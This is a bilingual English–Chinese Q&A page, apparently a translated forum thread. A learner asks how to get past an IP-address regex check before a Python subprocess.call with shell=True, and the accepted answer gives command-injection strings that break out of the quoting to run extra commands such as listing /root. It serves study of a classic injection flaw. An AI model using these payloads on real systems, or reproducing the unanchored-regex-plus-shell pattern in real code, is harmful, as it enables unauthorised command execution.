Python:subprocess.call注入
[英]Python: subprocess.call injection
问题描述
I'm doing a home study and i've got the challenge of trying to insert a command injection into some Python code. 
我正在做家庭学习,并且遇到了尝试在一些Python代码中插入命令注入的挑战。
the trouble i'm having is with the check, cant seem to bypass it. 我遇到的麻烦是支票,似乎无法绕过它。
address = sys.argv[1]
if not re.match("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", address):
return usage("Invalid argument")
subprocess.call("/bin/ping -c 3 '{0}'".format (address), shell = True)
cause the check above the subprocess checks if it' a valid IP address I can't manipulate it, and advise how to do this? 导致子流程上方的检查,检查它是否是有效的IP地址,我无法处理它,并建议如何执行此操作?
With kind regards, Patrick 亲切的问候,帕特里克
1 个解决方案
解决方案1
2 已采纳 2017-05-17 13:20:02
You can use a valid ip address followed by a system command, eg : 您可以使用有效的IP地址,后跟系统命令,例如:
127.0.0.1';/sbin/ifconfig;:'
If you want to include arguments, wrap argv[1] in double quotes : 如果要包含参数,请将argv[1]用双引号引起来:
"127.0.0.1';/bin/ls -al /root;'"
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.